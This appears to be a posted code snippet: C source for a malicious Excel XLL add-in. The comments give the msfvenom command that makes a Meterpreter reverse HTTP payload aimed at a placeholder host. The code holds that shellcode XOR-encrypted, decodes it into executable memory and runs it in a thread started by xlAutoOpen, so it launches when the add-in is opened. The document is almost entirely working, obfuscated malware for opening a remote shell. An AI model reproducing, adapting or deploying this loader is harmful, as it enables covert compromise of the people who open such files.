robpot891
10/9/2018 - 5:56 PM

shellcode_multibyteXOR_ExcelRegisterXLL.c

// Compile with:
//		cl.exe x86_meterpreter_reverse_http_xor.c /LD /o x86_meterpreter_reverse_http_xor.xll
//
// C/CPP code obtained like this:
// 1. Get a raw meterpreter shellcode:
//		msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai > met_rev_winhttp_x86.raw
// 2. Encrypt it with a custom multibyte XOR string (https://github.com/Arno0x/ShellcodeWrapper):
//		./shellcode_encoder.py -cpp met_rev_winhttp_x86.raw testkey xor

#include <Windows.h>

__declspec(dllexport) void __cdecl xlAutoOpen(void); 

DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{
	// Encrypted shellcode and cipher key obtained from shellcode_encoder.py
	unsigned char encryptedShellcode[] = "\x88\x8d\xf1\x74\x6b\x65\x19\xfd\x80\x42\xb4\x0f\xee\x29\x44\xee\x21\x78\xe0\x37\x6d\xff\x17\x5b\x7b\xdc\x2f\x5f\x45\x9a\xdf\x48\x0a\x19\x7b\x58\x45\xb2\xbb\x66\x64\xbe\x96\x97\x21\x23\xe0\x37\x69\xff\x2f\x4f\xff\x27\x74\x01\x97\x2d\x72\xa5\x3a\xee\x20\x54\x64\xa0\xff\x22\x7d\x9a\x4e\x2c\xf8\x40\xe0\x64\xaf\x45\x9a\xdf\xb5\xa4\x68\x78\xb3\x5d\x93\x01\x9d\x66\x04\x8c\x5e\x0e\x50\x1e\x81\x21\xff\x3d\x57\x75\xb8\x03\xf2\x78\x2e\xf8\x2c\x77\x64\xaa\xff\x61\xf8\x75\xbb\xec\x3d\x50\x41\x28\x2f\x0a\x3c\x23\x25\x9a\x93\x2b\x34\x3f\xf2\x66\x8e\xfe\x29\x03\x0b\x1c\x00\x65\x1b\x03\x02\x0b\x10\x20\x0d\x3f\x03\x4d\x62\x86\xa1\x54\xa8\x27\x38\x36\x2a\x27\x0d\x49\x22\x12\xc2\x86\xa1\x36\x20\x1e\x68\x36\x2a\x1e\x35\x9b\xe3\x6b\x65\x79\x5b\x2c\x2c\x44\x09\x3d\x33\x1d\x1f\x36\x23\x5a\x0d\x2c\x19\x27\x27\x3b\x28\x33\x32\x3f\x24\x34\x02\x39\x0c\x4c\x18\x48\x01\x20\x13\x5c\x30\x46\x27\x16\x06\x6b\x35\x11\x23\xec\xec\xb2\x94\xb0\xf0\xb2\x36\x1b\x74\x69\x05\xfd\x27\x36\x20\x23\x38\x33\x11\x9f\x30\x5d\x4f\x94\xb0\xef\x1e\x6f\x2c\x27\x38\x36\x2a\x22\x0d\x5e\x72\x73\x1e\x86\xa1\xe0\xb3\x01\x63\x2a\x0c\x99\x8d\x3f\x74\x6b\x65\x13\x34\x0d\x73\x64\x6b\x65\x11\x74\x65\x33\x74\x38\x0d\x21\xd0\x36\x96\x8b\xbe\xf6\x2a\x27\xec\x94\x23\x03\x65\x59\x74\x65\x20\x22\x03\x77\xef\xfd\x87\x8c\xa1\xee\xa5\x0d\xbb\xee\x74\x75\xa8\xe0\xb9\x01\x80\x2b\xb7\x34\x8d\xf2\x8b\x9a\x8c\x15\x05\x1c\x57\x03\x00\x11\x07\x02\x11\x1c\x5a\x06\x1c\x19\x6b\xde\x89\xc1\xc7\x25\x1e\x6b\x36\x86\xa1";
	unsigned char key[] = "testkey";
	void *exec;

	// Char array to host the deciphered shellcode
	unsigned char shellcode[sizeof encryptedShellcode];	

	// XOR decoding stub using the key defined above must be the same as the encoding key
	int j = 0;
	int i;
	for (i = 0; i < sizeof encryptedShellcode; i++) {
		if (j == sizeof key - 1) j = 0;
		shellcode[i] = encryptedShellcode[i] ^ key[j];
		j++;
	}

	// Allocating memory with EXECUTE writes
	exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	// Copying deciphered shellcode into memory as a function
	memcpy(exec, shellcode, sizeof shellcode);

	// Call the shellcode
	((void(*)())exec)();
	
	return 1;
}

void __cdecl xlAutoOpen()
{
    	HANDLE threadHandle;
	// Create a thread and close the handle as we do not want to use it to wait for it 
	threadHandle = CreateThread(NULL, 0, ThreadFunction, NULL, 0, NULL);
	CloseHandle(threadHandle);    
}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
					 )
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}